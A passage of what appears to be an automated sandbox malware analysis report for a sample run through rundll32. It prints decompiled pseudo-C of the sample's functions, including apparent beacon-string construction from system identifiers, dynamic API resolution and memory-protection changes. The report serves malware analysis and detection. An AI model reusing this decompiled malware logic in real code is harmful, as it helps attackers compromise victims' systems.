                                            • Part of subcall function 005115C2: LoadLibraryA.KERNEL32 ref: 005115F8
                                            • Part of subcall function 005115C2: lstrlenA.KERNEL32 ref: 0051160E
                                            • Part of subcall function 005115C2: memset.NTDLL ref: 00511618
                                            • Part of subcall function 005115C2: GetProcAddress.KERNEL32(?,00000002), ref: 0051167B
                                            • Part of subcall function 005115C2: lstrlenA.KERNEL32(-00000002), ref: 00511690
                                            • Part of subcall function 005115C2: memset.NTDLL ref: 0051169A
                                            • Part of subcall function 00511EB4: VirtualProtect.KERNELBASE(00000000,?,00000004,?,?,?,00000000,?,?), ref: 00511EE2
                                            • Part of subcall function 00511EB4: VirtualProtect.KERNELBASE(00000000,00000000,00000004,?), ref: 00511F3A
                                            • Part of subcall function 00511EB4: GetLastError.KERNEL32 ref: 00511F40
                                          • GetLastError.KERNEL32(?,0051178F), ref: 00511B49
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.519984285.0000000000510000.00000040.00020000.sdmp, Offset: 00510000, based on PE: true
                                          • Associated: 00000003.00000002.520021695.0000000000515000.00000040.00020000.sdmp Download File
                                          • Associated: 00000003.00000002.520067609.0000000000517000.00000040.00020000.sdmp Download File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_510000_rundll32.jbxd
                                          Similarity
                                          • API ID: AddressProc$ErrorLastProtectVirtuallstrlenmemcpymemset$HandleLibraryLoadModule
                                          • String ID:
                                          • API String ID: 33504255-0
                                          • Opcode ID: 63163109e4fe9a452f52341f1322cedb5d59beaeaf52e01ea338e20df6242019
                                          • Instruction ID: 3a5e7b14f9d18fe1125283dc55c9f72e666bbbbb5e0287c97bdda9a63fd8a9a8
                                          • Opcode Fuzzy Hash: 63163109e4fe9a452f52341f1322cedb5d59beaeaf52e01ea338e20df6242019
                                          • Instruction Fuzzy Hash: CD11AC72600B116BE7216BE58C89DEB7FACBF54754B0001A4FB05D7241FB60ED45C7A8
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 04089347, Relevance: 1.3, APIs: 1, Instructions: 57memoryCOMMON
                                          Download Yara Rule
                                          C-Code - Quality: 70%
                                          			E04089347(void* __ecx, signed char* _a4) {
				void* _v8;
				void* _t8;
				signed short _t11;
				signed int _t12;
				signed int _t14;
				intOrPtr _t15;
				void* _t19;
				signed short* _t22;
				void* _t24;
				intOrPtr* _t27;

				_t24 = 0;
				_push(0);
				_t19 = 1;
				_t27 = 0x408d330;
				E0408684E();
				while(1) {
					_t8 = E040832BA(_a4,  &_v8); // executed
					if(_t8 == 0) {
						break;
					}
					_push(_v8);
					_t14 = 0xd;
					_t15 = E0408A5E9(_t14);
					if(_t15 == 0) {
						HeapFree( *0x408d238, 0, _v8);
						break;
					} else {
						 *_t27 = _t15;
						_t27 = _t27 + 4;
						_t24 = _t24 + 1;
						if(_t24 < 3) {
							continue;
						} else {
						}
					}
					L7:
					_push(1);
					E0408684E();
					if(_t19 != 0) {
						_t22 =  *0x408d338; // 0x4c89b58
						_t11 =  *_t22 & 0x0000ffff;
						if(_t11 < 0x61 || _t11 > 0x7a) {
							_t12 = _t11 & 0x0000ffff;
						} else {
							_t12 = (_t11 & 0x0000ffff) - 0x20;
						}
						 *_t22 = _t12;
					}
					return _t19;
				}
				_t19 = 0;
				goto L7;
			}













                                          0x0408934f
                                          0x04089353
                                          0x04089354
                                          0x04089355
                                          0x0408935a
                                          0x0408935f
                                          0x04089366
                                          0x0408936d
                                          0x00000000
                                          0x00000000
                                          0x0408936f
                                          0x04089374
                                          0x04089375
                                          0x0408937c
                                          0x04089396
                                          0x00000000
                                          0x0408937e
                                          0x0408937e
                                          0x04089380
                                          0x04089383
                                          0x04089387
                                          0x00000000
                                          0x00000000
                                          0x04089389
                                          0x04089387
                                          0x0408939e
                                          0x0408939e
                                          0x040893a0
                                          0x040893a7
                                          0x040893a9
                                          0x040893af
                                          0x040893b6
                                          0x040893c6
                                          0x040893be
                                          0x040893c1
                                          0x040893c1
                                          0x040893c9
                                          0x040893c9
                                          0x040893d2
                                          0x040893d2
                                          0x0408939c
                                          0x00000000

                                          APIs
                                            • Part of subcall function 0408684E: GetProcAddress.KERNEL32(36776F57,0408935F), ref: 04086869
                                            • Part of subcall function 040832BA: RtlAllocateHeap.NTDLL(00000000,59935A40,00000000), ref: 040832E5
                                            • Part of subcall function 040832BA: RtlAllocateHeap.NTDLL(00000000,59935A40), ref: 04083307
                                            • Part of subcall function 040832BA: memset.NTDLL ref: 04083321
                                            • Part of subcall function 040832BA: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000080,00000000,73797325), ref: 0408335F
                                            • Part of subcall function 040832BA: GetFileTime.KERNEL32(00000000,?,00000000,00000000), ref: 04083373
                                            • Part of subcall function 040832BA: FindCloseChangeNotification.KERNEL32(00000000), ref: 0408338A
                                            • Part of subcall function 040832BA: StrRChrA.SHLWAPI(?,00000000,0000005C), ref: 04083396
                                            • Part of subcall function 040832BA: lstrcat.KERNEL32(?,642E2A5C), ref: 040833D7
                                            • Part of subcall function 040832BA: FindFirstFileA.KERNEL32(?,?), ref: 040833ED
                                            • Part of subcall function 0408A5E9: lstrlen.KERNEL32(?,00000000,0408D330,00000001,0408937A,0408D00C,0408D00C,00000000,00000005,00000000,00000000,?,?,?,0408207E,?), ref: 0408A5F2
                                            • Part of subcall function 0408A5E9: mbstowcs.NTDLL ref: 0408A619
                                            • Part of subcall function 0408A5E9: memset.NTDLL ref: 0408A62B
                                          • HeapFree.KERNEL32(00000000,0408D00C,0408D00C,0408D00C,00000000,00000005,00000000,00000000,?,?,?,0408207E,?,0408D00C,?,?), ref: 04089396
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.525623570.0000000004081000.00000020.00020000.sdmp, Offset: 04080000, based on PE: true
                                          • Associated: 00000003.00000002.525606133.0000000004080000.00000004.00020000.sdmp Download File
                                          • Associated: 00000003.00000002.525645706.000000000408C000.00000002.00020000.sdmp Download File
                                          • Associated: 00000003.00000002.525663067.000000000408D000.00000004.00020000.sdmp Download File
                                          • Associated: 00000003.00000002.525690686.000000000408F000.00000002.00020000.sdmp Download File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_4080000_rundll32.jbxd
                                          Similarity
                                          • API ID: FileHeap$AllocateFindmemset$AddressChangeCloseCreateFirstFreeNotificationProcTimelstrcatlstrlenmbstowcs
                                          • String ID:
                                          • API String ID: 983081259-0
                                          • Opcode ID: bb87f4fc4cdaeadde4087e1a29b1639eea030c8c91fc362dacd133a5d6387711
                                          • Instruction ID: 33417547a8cfe0a83729ada9318ce68a6d97d075bfe30f0afd6e3cbf0dd2231d
                                          • Opcode Fuzzy Hash: bb87f4fc4cdaeadde4087e1a29b1639eea030c8c91fc362dacd133a5d6387711
                                          • Instruction Fuzzy Hash: 1D0149B1200205EAF7007EE6DF80BBA76A8DB4536CB00013EF8C4F61E0D664BD815260
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 04081B13, Relevance: 1.3, APIs: 1, Instructions: 42memoryCOMMON
                                          Download Yara Rule
                                          C-Code - Quality: 100%
                                          			E04081B13(void** __edi, intOrPtr _a4, unsigned int _a8, void* _a12) {
				void* _t15;
				void* _t21;
				signed int _t23;
				void* _t26;

				if(_a4 != 0) {
					_t15 = E04087BA9(_a4, _a8, _a12, __edi); // executed
					_t26 = _t15;
				} else {
					_t26 = E040874B9(0, 0x80000002, _a8, _a12,  &_a12,  &_a8);
					if(_t26 == 0) {
						_t23 = _a8 >> 1;
						if(_t23 == 0) {
							_t26 = 2;
							HeapFree( *0x408d238, 0, _a12);
						} else {
							_t21 = _a12;
							 *((short*)(_t21 + _t23 * 2 - 2)) = 0;
							 *__edi = _t21;
						}
					}
				}
				return _t26;
			}







                                          0x04081b1b
                                          0x04081b72
                                          0x04081b77
                                          0x04081b1d
                                          0x04081b37
                                          0x04081b3b
                                          0x04081b40
                                          0x04081b42
                                          0x04081b54
                                          0x04081b60
                                          0x04081b44
                                          0x04081b44
                                          0x04081b49
                                          0x04081b4e
                                          0x04081b4e
                                          0x04081b42
                                          0x04081b3b
                                          0x04081b7d

                                          APIs
                                          • HeapFree.KERNEL32(00000000,?,00000000,80000002,7519F710,?,?,7519F710,00000000,?,0408690C,?,004F0053,04C89388,00000000,?), ref: 04081B60
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.525623570.0000000004081000.00000020.00020000.sdmp, Offset: 04080000, based on PE: true
                                          • Associated: 00000003.00000002.525606133.0000000004080000.00000004.00020000.sdmp Download File
                                          • Associated: 00000003.00000002.525645706.000000000408C000.00000002.00020000.sdmp Download File
                                          • Associated: 00000003.00000002.525663067.000000000408D000.00000004.00020000.sdmp Download File
                                          • Associated: 00000003.00000002.525690686.000000000408F000.00000002.00020000.sdmp Download File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_4080000_rundll32.jbxd
                                          Similarity
                                          • API ID: FreeHeap
                                          • String ID:
                                          • API String ID: 3298025750-0
                                          • Opcode ID: 3c7405765f893635d929a008d998acb56e5ea7ba84c0e5a233f7c969dc32048b
                                          • Instruction ID: c4b5cef82fcf9ea41143339bffef8f3b8d7dff99b6313ed7652aaa2ac694414b
                                          • Opcode Fuzzy Hash: 3c7405765f893635d929a008d998acb56e5ea7ba84c0e5a233f7c969dc32048b
                                          • Instruction Fuzzy Hash: 84016731100119FBDB21AF94DD01FDA77A5EF94360F04842DFA59AE160E730D921D790
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 0408A872, Relevance: 1.3, APIs: 1, Instructions: 36sleepCOMMON
                                          Download Yara Rule
                                          C-Code - Quality: 88%
                                          			E0408A872(intOrPtr* __edi) {
				intOrPtr _v8;
				char _v12;
				intOrPtr _v16;
				intOrPtr _t15;
				intOrPtr* _t21;

				_t21 = __edi;
				_push( &_v12);
				_push(__edi);
				_v8 = 0x1d4c0;
				_t15 =  *((intOrPtr*)( *__edi + 0xe0))();
				while(1) {
					_v16 = _t15;
					Sleep(0x1f4); // executed
					if(_v12 == 4) {
						break;
					}
					if(_v8 == 0) {
						L4:
						_t15 =  *((intOrPtr*)( *_t21 + 0xe0))(_t21,  &_v12);
						continue;
					} else {
						if(_v8 <= 0x1f4) {
							_v16 = 0x80004004;
						} else {
							_v8 = _v8 - 0x1f4;
							goto L4;
						}
					}
					L8:
					return _v16;
				}
				goto L8;
			}








                                          0x0408a872
                                          0x0408a87f
                                          0x0408a880
                                          0x0408a881
                                          0x0408a888
                                          0x0408a8b6
                                          0x0408a8b7
                                          0x0408a8ba
                                          0x0408a8c0
                                          0x00000000
                                          0x00000000
                                          0x0408a89f
                                          0x0408a8a9
                                          0x0408a8b0
                                          0x00000000
                                          0x0408a8a1
                                          0x0408a8a4
                                          0x0408a8c4
                                          0x0408a8a6
                                          0x0408a8a6
                                          0x00000000
                                          0x0408a8a6
                                          0x0408a8a4
                                          0x0408a8cb
                                          0x0408a8d1
                                          0x0408a8d1
                                          0x00000000

                                          APIs
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.525623570.0000000004081000.00000020.00020000.sdmp, Offset: 04080000, based on PE: true
                                          • Associated: 00000003.00000002.525606133.0000000004080000.00000004.00020000.sdmp Download File
                                          • Associated: 00000003.00000002.525645706.000000000408C000.00000002.00020000.sdmp Download File
                                          • Associated: 00000003.00000002.525663067.000000000408D000.00000004.00020000.sdmp Download File
                                          • Associated: 00000003.00000002.525690686.000000000408F000.00000002.00020000.sdmp Download File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_4080000_rundll32.jbxd
                                          Similarity
                                          • API ID: Sleep
                                          • String ID:
                                          • API String ID: 3472027048-0
                                          • Opcode ID: d7ba2fd8a83599ea036ad9519f0ee406c8ca98ac9a6a135efef5f5d2a33ab040
                                          • Instruction ID: 6257db1876fd44a2452ed62a94f26aec27580d541b7d3e25c4357103397f648b
                                          • Opcode Fuzzy Hash: d7ba2fd8a83599ea036ad9519f0ee406c8ca98ac9a6a135efef5f5d2a33ab040
                                          • Instruction Fuzzy Hash: 4FF01971E01218EFDB00EB94C688AEDB7B8EF04204F1080AFE942B7140D3B46B85CF62
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 040860CF, Relevance: 1.3, APIs: 1, Instructions: 23COMMON
                                          Download Yara Rule
                                          C-Code - Quality: 100%
                                          			E040860CF(void* __edx, void* __edi, void* _a4) {
				int _t7;
				int _t13;

				_t7 = E04087A28(__edx, __edi, _a4,  &_a4); // executed
				_t13 = _t7;
				if(_t13 != 0) {
					memcpy(__edi, _a4, _t13);
					 *((char*)(__edi + _t13)) = 0;
					E0408147E(_a4);
				}
				return _t13;
			}





                                          0x040860db
                                          0x040860e0
                                          0x040860e4
                                          0x040860eb
                                          0x040860f6
                                          0x040860fa
                                          0x040860fa
                                          0x04086103

                                          APIs
                                            • Part of subcall function 04087A28: memcpy.NTDLL(00000000,00000090,?,?,?,00000008), ref: 04087A5E
                                            • Part of subcall function 04087A28: memset.NTDLL ref: 04087AD3
                                            • Part of subcall function 04087A28: memset.NTDLL ref: 04087AE7
                                          • memcpy.NTDLL(?,?,00000000,?,?,?,?,?,04089F9F,?,?,04089C62,00000002,?,?,?), ref: 040860EB
                                            • Part of subcall function 0408147E: HeapFree.KERNEL32(00000000,00000000,04081D11,00000000,?,?,-00000008), ref: 0408148A
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.525623570.0000000004081000.00000020.00020000.sdmp, Offset: 04080000, based on PE: true
                                          • Associated: 00000003.00000002.525606133.0000000004080000.00000004.00020000.sdmp Download File
                                          • Associated: 00000003.00000002.525645706.000000000408C000.00000002.00020000.sdmp Download File
                                          • Associated: 00000003.00000002.525663067.000000000408D000.00000004.00020000.sdmp Download File
                                          • Associated: 00000003.00000002.525690686.000000000408F000.00000002.00020000.sdmp Download File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_4080000_rundll32.jbxd
                                          Similarity
                                          • API ID: memcpymemset$FreeHeap
                                          • String ID:
                                          • API String ID: 3053036209-0
                                          • Opcode ID: f2b2b8ba8929acc20bdd7dadbc9947bfae244f1e76b9b7981e545fa298f64d36
                                          • Instruction ID: 20b601539e5fd55f239ef46cd0073cc2ac289aa58759536777b89a2a4ac83a60
                                          • Opcode Fuzzy Hash: f2b2b8ba8929acc20bdd7dadbc9947bfae244f1e76b9b7981e545fa298f64d36
                                          • Instruction Fuzzy Hash: 4AE08C7650012977DB223A94DC40DEF7F5C8F52699F004028FE88AA205EA26EA1097E1
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Non-executed Functions

                                          Function 0408514F, Relevance: 34.7, APIs: 23, Instructions: 204memorystringCOMMON
                                          Download Yara Rule
                                          C-Code - Quality: 66%
                                          			E0408514F(long __eax, void* __ecx, void* __edx, intOrPtr _a12, void* _a16, void* _a24, intOrPtr _a32) {
				intOrPtr _v0;
				intOrPtr _v4;
				intOrPtr _v20;
				intOrPtr _v28;
				intOrPtr _v32;
				void* _v48;
				intOrPtr _v56;
				void* __edi;
				long _t26;
				intOrPtr _t27;
				intOrPtr _t28;
				intOrPtr _t29;
				intOrPtr _t30;
				intOrPtr _t31;
				void* _t34;
				intOrPtr _t35;
				int _t38;
				intOrPtr _t43;
				intOrPtr _t44;
				intOrPtr _t51;
				intOrPtr _t55;
				intOrPtr* _t57;
				intOrPtr _t63;
				intOrPtr _t65;
				intOrPtr _t71;
				intOrPtr _t74;
				intOrPtr _t77;
				int _t80;
				intOrPtr _t81;
				int _t84;
				intOrPtr _t86;
				int _t89;
				intOrPtr* _t92;
				intOrPtr* _t93;
				void* _t94;
				void* _t98;
				void* _t99;
				void* _t100;
				intOrPtr _t101;
				void* _t103;
				int _t104;
				void* _t105;
				void* _t106;
				void* _t108;
				void* _t109;
				void* _t111;

				_t98 = __edx;
				_t94 = __ecx;
				_t26 = __eax;
				_t108 = _a16;
				_v4 = 8;
				if(__eax == 0) {
					_t26 = GetTickCount();
				}
				_t27 =  *0x408d018; // 0x3df0b315
				asm("bswap eax");
				_t28 =  *0x408d014; // 0x3a87c8cd
				asm("bswap eax");
				_t29 =  *0x408d010; // 0xd8d2f808
				asm("bswap eax");
				_t30 =  *0x408d00c; // 0x8f8f86c2
				asm("bswap eax");
				_t31 =  *0x408d2a4; // 0xbfa5a8
				_t3 = _t31 + 0x408e633; // 0x74666f73
				_t104 = wsprintfA(_t108, _t3, 2, 0x3d137, _t30, _t29, _t28, _t27,  *0x408d02c,  *0x408d004, _t26);
				_t34 = E040857AB();
				_t35 =  *0x408d2a4; // 0xbfa5a8
				_t4 = _t35 + 0x408e673; // 0x74707526
				_t38 = wsprintfA(_t104 + _t108, _t4, _t34);
				_t111 = _t109 + 0x38;
				_t105 = _t104 + _t38;
				_t99 = E040873E9(_t94);
				if(_t99 != 0) {
					_t86 =  *0x408d2a4; // 0xbfa5a8
					_t6 = _t86 + 0x408e8cb; // 0x736e6426
					_t89 = wsprintfA(_t105 + _t108, _t6, _t99);
					_t111 = _t111 + 0xc;
					_t105 = _t105 + _t89;
					HeapFree( *0x408d238, 0, _t99);
				}
				_t100 = E0408614A();
				if(_t100 != 0) {
					_t81 =  *0x408d2a4; // 0xbfa5a8
					_t8 = _t81 + 0x408e8d3; // 0x6f687726
					_t84 = wsprintfA(_t105 + _t108, _t8, _t100);
					_t111 = _t111 + 0xc;
					_t105 = _t105 + _t84;
					HeapFree( *0x408d238, 0, _t100);
				}
				_t101 =  *0x408d324; // 0x4c895b0
				_a32 = E0408757B(0x408d00a, _t101 + 4);
				_t43 =  *0x408d2cc; // 0x0
				if(_t43 != 0) {
					_t77 =  *0x408d2a4; // 0xbfa5a8
					_t11 = _t77 + 0x408e8ad; // 0x3d736f26
					_t80 = wsprintfA(_t105 + _t108, _t11, _t43);
					_t111 = _t111 + 0xc;
					_t105 = _t105 + _t80;
				}
				_t44 =  *0x408d2c8; // 0x0
				if(_t44 != 0) {
					_t74 =  *0x408d2a4; // 0xbfa5a8
					_t13 = _t74 + 0x408e8a6; // 0x3d706926
					wsprintfA(_t105 + _t108, _t13, _t44);
				}
				if(_a32 != 0) {
					_t103 = RtlAllocateHeap( *0x408d238, 0, 0x800);
					if(_t103 != 0) {
						E0408749F(GetTickCount());
						_t51 =  *0x408d324; // 0x4c895b0
						__imp__(_t51 + 0x40);
						asm("lock xadd [eax], ecx");
						_t55 =  *0x408d324; // 0x4c895b0
						__imp__(_t55 + 0x40);
						_t57 =  *0x408d324; // 0x4c895b0
						_t106 = E04084D2C(1, _t98, _t108,  *_t57);
						asm("lock xadd [eax], ecx");
						if(_t106 != 0) {
							StrTrimA(_t106, 0x408c294);
							_t63 =  *0x408d2a4; // 0xbfa5a8
							_push(_t106);
							_t15 = _t63 + 0x408e252; // 0x616d692f
							_t65 = E04089DEF(_t15);
							_v20 = _t65;
							if(_t65 != 0) {
								_t92 = __imp__;
								 *_t92(_t106, _v4);
								 *_t92(_t103, _v0);
								_t93 = __imp__;
								 *_t93(_t103, _v32);
								 *_t93(_t103, _t106);
								_t71 = E0408666E(0xffffffffffffffff, _t103, _v32, _v28);
								_v56 = _t71;
								if(_t71 != 0 && _t71 != 0x10d2) {
									E04086106();
								}
								HeapFree( *0x408d238, 0, _v48);
							}
							HeapFree( *0x408d238, 0, _t106);
						}
						HeapFree( *0x408d238, 0, _t103);
					}
					HeapFree( *0x408d238, 0, _a24);
				}
				HeapFree( *0x408d238, 0, _t108);
				return _a12;
			}

















































                                          0x0408514f
                                          0x0408514f
                                          0x0408514f
                                          0x04085154
                                          0x0408515a
                                          0x04085164
                                          0x04085166
                                          0x04085166
                                          0x04085173
                                          0x0408517e
                                          0x04085181
                                          0x0408518c
                                          0x0408518f
                                          0x04085194
                                          0x04085197
                                          0x0408519c
                                          0x0408519f
                                          0x040851ab
                                          0x040851b8
                                          0x040851ba
                                          0x040851c0
                                          0x040851c5
                                          0x040851d0
                                          0x040851d2
                                          0x040851d5
                                          0x040851dc
                                          0x040851e0
                                          0x040851e2
                                          0x040851e7
                                          0x040851f3
                                          0x040851f5
                                          0x04085201
                                          0x04085203
                                          0x04085203
                                          0x0408520e
                                          0x04085212
                                          0x04085214
                                          0x04085219
                                          0x04085225
                                          0x04085227
                                          0x04085233
                                          0x04085235
                                          0x04085235
                                          0x0408523b
                                          0x0408524e
                                          0x04085252
                                          0x04085259
                                          0x0408525c
                                          0x04085261
                                          0x0408526c
                                          0x0408526e
                                          0x04085271
                                          0x04085271
                                          0x04085273
                                          0x0408527a
                                          0x0408527d
                                          0x04085282
                                          0x0408528c
                                          0x0408528e
                                          0x04085296
                                          0x040852af
                                          0x040852b3
                                          0x040852bf
                                          0x040852c4
                                          0x040852cd
                                          0x040852de
                                          0x040852e2
                                          0x040852eb
                                          0x040852f1
                                          0x040852fe
                                          0x0408530b
                                          0x04085311
                                          0x0408531d
                                          0x04085323
                                          0x04085328
                                          0x04085329
                                          0x04085330
                                          0x04085335
                                          0x0408533b
                                          0x04085341
                                          0x04085348
                                          0x0408534f
                                          0x04085355
                                          0x0408535c
                                          0x04085360
                                          0x0408536b
                                          0x04085370
                                          0x04085376
                                          0x0408537f
                                          0x0408537f
                                          0x04085390
                                          0x04085390
                                          0x0408539f
                                          0x0408539f
                                          0x040853ae
                                          0x040853ae
                                          0x040853c0
                                          0x040853c0
                                          0x040853cf
                                          0x040853e0

                                          APIs
                                          • GetTickCount.KERNEL32 ref: 04085166
                                          • wsprintfA.USER32 ref: 040851B3
                                          • wsprintfA.USER32 ref: 040851D0
                                          • wsprintfA.USER32 ref: 040851F3
                                          • HeapFree.KERNEL32(00000000,00000000), ref: 04085203
                                          • wsprintfA.USER32 ref: 04085225
                                          • HeapFree.KERNEL32(00000000,00000000), ref: 04085235
                                          • wsprintfA.USER32 ref: 0408526C
                                          • wsprintfA.USER32 ref: 0408528C
                                          • RtlAllocateHeap.NTDLL(00000000,00000800), ref: 040852A9
                                          • GetTickCount.KERNEL32 ref: 040852B9
                                          • RtlEnterCriticalSection.NTDLL(04C89570), ref: 040852CD
                                          • RtlLeaveCriticalSection.NTDLL(04C89570), ref: 040852EB
                                            • Part of subcall function 04084D2C: lstrlen.KERNEL32(00000000,253D7325,00000000,00000000,74ECC740,?,?,040852FE,?,04C895B0), ref: 04084D57
                                            • Part of subcall function 04084D2C: lstrlen.KERNEL32(?,?,?,040852FE,?,04C895B0), ref: 04084D5F
                                            • Part of subcall function 04084D2C: strcpy.NTDLL ref: 04084D76
                                            • Part of subcall function 04084D2C: lstrcat.KERNEL32(00000000,?), ref: 04084D81
                                            • Part of subcall function 04084D2C: StrTrimA.SHLWAPI(00000000,=,00000000,00000000,?,?,?,040852FE,?,04C895B0), ref: 04084D9E
                                          • StrTrimA.SHLWAPI(00000000,0408C294,?,04C895B0), ref: 0408531D
                                            • Part of subcall function 04089DEF: lstrlen.KERNEL32(?,00000000,00000000,04085335,616D692F,00000000), ref: 04089DFB
                                            • Part of subcall function 04089DEF: lstrlen.KERNEL32(?), ref: 04089E03
                                            • Part of subcall function 04089DEF: lstrcpy.KERNEL32(00000000,?), ref: 04089E1A
                                            • Part of subcall function 04089DEF: lstrcat.KERNEL32(00000000,?), ref: 04089E25
                                          • lstrcpy.KERNEL32(00000000,?), ref: 04085348
                                          • lstrcpy.KERNEL32(00000000,00000000), ref: 0408534F
                                          • lstrcat.KERNEL32(00000000,?), ref: 0408535C
                                          • lstrcat.KERNEL32(00000000,00000000), ref: 04085360
                                            • Part of subcall function 0408666E: WaitForSingleObject.KERNEL32(00000000,00000000,00000000,751881D0), ref: 04086720
                                          • HeapFree.KERNEL32(00000000,?,00000000,?,?), ref: 04085390
                                          • HeapFree.KERNEL32(00000000,00000000,616D692F,00000000), ref: 0408539F
                                          • HeapFree.KERNEL32(00000000,00000000,?,04C895B0), ref: 040853AE
                                          • HeapFree.KERNEL32(00000000,00000000), ref: 040853C0
                                          • HeapFree.KERNEL32(00000000,?), ref: 040853CF
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.525623570.0000000004081000.00000020.00020000.sdmp, Offset: 04080000, based on PE: true
                                          • Associated: 00000003.00000002.525606133.0000000004080000.00000004.00020000.sdmp Download File
                                          • Associated: 00000003.00000002.525645706.000000000408C000.00000002.00020000.sdmp Download File
                                          • Associated: 00000003.00000002.525663067.000000000408D000.00000004.00020000.sdmp Download File
                                          • Associated: 00000003.00000002.525690686.000000000408F000.00000002.00020000.sdmp Download File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_4080000_rundll32.jbxd
                                          Similarity
                                          • API ID: Heap$Free$wsprintf$lstrcatlstrlen$lstrcpy$CountCriticalSectionTickTrim$AllocateEnterLeaveObjectSingleWaitstrcpy
                                          • String ID:
                                          • API String ID: 3080378247-0
                                          • Opcode ID: 11402061ce7d70dcf66e8aa3cd6e08482f4c1d3d2458f51b3beea0a4c60d1078
                                          • Instruction ID: 98065eb611fd81518863563ca080b0d4d091bb7c58c21af3e2af3b82ea4f27bd
                                          • Opcode Fuzzy Hash: 11402061ce7d70dcf66e8aa3cd6e08482f4c1d3d2458f51b3beea0a4c60d1078
                                          • Instruction Fuzzy Hash: 95616C71500205AFE711AF64EE48F5A7BE8EF48354B05063CF988FB290DB2DED059B65
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 0408ADA5, Relevance: 19.5, APIs: 10, Strings: 1, Instructions: 209libraryCOMMON
                                          Download Yara Rule
                                          C-Code - Quality: 51%
                                          			E0408ADA5(long _a4, long _a8) {
				signed int _v8;
				intOrPtr _v16;
				LONG* _v28;
				long _v40;
				long _v44;
				long _v48;
				CHAR* _v52;
				long _v56;
				CHAR* _v60;
				long _v64;
				signed int* _v68;
				char _v72;
				signed int _t76;
				signed int _t80;
				signed int _t81;
				intOrPtr* _t82;
				intOrPtr* _t83;
				intOrPtr* _t85;
				intOrPtr* _t90;
				intOrPtr* _t95;
				intOrPtr* _t98;
				void* _t102;
				intOrPtr* _t104;
				void* _t115;
				long _t116;
				void _t125;
				void* _t131;
				signed short _t133;
				struct HINSTANCE__* _t138;
				signed int* _t139;

				_t139 = _a4;
				_v28 = _t139[2] + 0x4080000;
				_t115 = _t139[3] + 0x4080000;
				_t131 = _t139[4] + 0x4080000;
				_v8 = _t139[7];
				_v60 = _t139[1] + 0x4080000;
				_v16 = _t139[5] + 0x4080000;
				_v64 = _a8;
				_v72 = 0x24;
				_v68 = _t139;
				_v56 = 0;
				asm("stosd");
				_v48 = 0;
				_v44 = 0;
				_v40 = 0;
				if(( *_t139 & 0x00000001) == 0) {
					_a8 =  &_v72;
					RaiseException(0xc06d0057, 0, 1,  &_a8);
					return 0;
				}
				_t138 =  *_v28;
				_t76 = _a8 - _t115 >> 2 << 2;
				_t133 =  *(_t131 + _t76);
				_a4 = _t76;
				_t80 =  !(_t133 >> 0x1f) & 0x00000001;
				_v56 = _t80;
				_t81 = _t133 + 0x4080002;
				if(_t80 == 0) {
					_t81 = _t133 & 0x0000ffff;
				}
				_v52 = _t81;
				_t82 =  *0x408d1a0; // 0x0
				_t116 = 0;
				if(_t82 == 0) {
					L6:
					if(_t138 != 0) {
						L18:
						_t83 =  *0x408d1a0; // 0x0
						_v48 = _t138;
						if(_t83 != 0) {
							_t116 =  *_t83(2,  &_v72);
						}
						if(_t116 != 0) {
							L32:
							 *_a8 = _t116;
							L33:
							_t85 =  *0x408d1a0; // 0x0
							if(_t85 != 0) {
								_v40 = _v40 & 0x00000000;
								_v48 = _t138;
								_v44 = _t116;
								 *_t85(5,  &_v72);
							}
							return _t116;
						} else {
							if(_t139[5] == _t116 || _t139[7] == _t116) {
								L27:
								_t116 = GetProcAddress(_t138, _v52);
								if(_t116 == 0) {
									_v40 = GetLastError();
									_t90 =  *0x408d19c; // 0x0
									if(_t90 != 0) {
										_t116 =  *_t90(4,  &_v72);
									}
									if(_t116 == 0) {
										_a4 =  &_v72;
										RaiseException(0xc06d007f, _t116, 1,  &_a4);
										_t116 = _v44;
									}
								}
								goto L32;
							} else {
								_t95 =  *((intOrPtr*)(_t138 + 0x3c)) + _t138;
								if( *_t95 == 0x4550 &&  *((intOrPtr*)(_t95 + 8)) == _v8 && _t138 ==  *((intOrPtr*)(_t95 + 0x34))) {
									_t116 =  *(_a4 + _v16);
									if(_t116 != 0) {
										goto L32;
									}
								}
								goto L27;
							}
						}
					}
					_t98 =  *0x408d1a0; // 0x0
					if(_t98 == 0) {
						L9:
						_t138 = LoadLibraryA(_v60);
						if(_t138 != 0) {
							L13:
							if(InterlockedExchange(_v28, _t138) == _t138) {
								FreeLibrary(_t138);
							} else {
								if(_t139[6] != 0) {
									_t102 = LocalAlloc(0x40, 8);
									if(_t102 != 0) {
										 *(_t102 + 4) = _t139;
										_t125 =  *0x408d198; // 0x0
										 *_t102 = _t125;
										 *0x408d198 = _t102;
									}
								}
							}
							goto L18;
						}
						_v40 = GetLastError();
						_t104 =  *0x408d19c; // 0x0
						if(_t104 == 0) {
							L12:
							_a8 =  &_v72;
							RaiseException(0xc06d007e, 0, 1,  &_a8);
							return _v44;
						}
						_t138 =  *_t104(3,  &_v72);
						if(_t138 != 0) {
							goto L13;
						}
						goto L12;
					}
					_t138 =  *_t98(1,  &_v72);
					if(_t138 != 0) {
						goto L13;
					}
					goto L9;
				}
				_t116 =  *_t82(0,  &_v72);
				if(_t116 != 0) {
					goto L33;
				}
				goto L6;
			}

































                                          0x0408adb4
                                          0x0408adca
                                          0x0408add0
                                          0x0408add2
                                          0x0408add7
                                          0x0408addd
                                          0x0408ade2
                                          0x0408ade5
                                          0x0408adf3
                                          0x0408adfa
                                          0x0408adfd
                                          0x0408ae00
                                          0x0408ae01
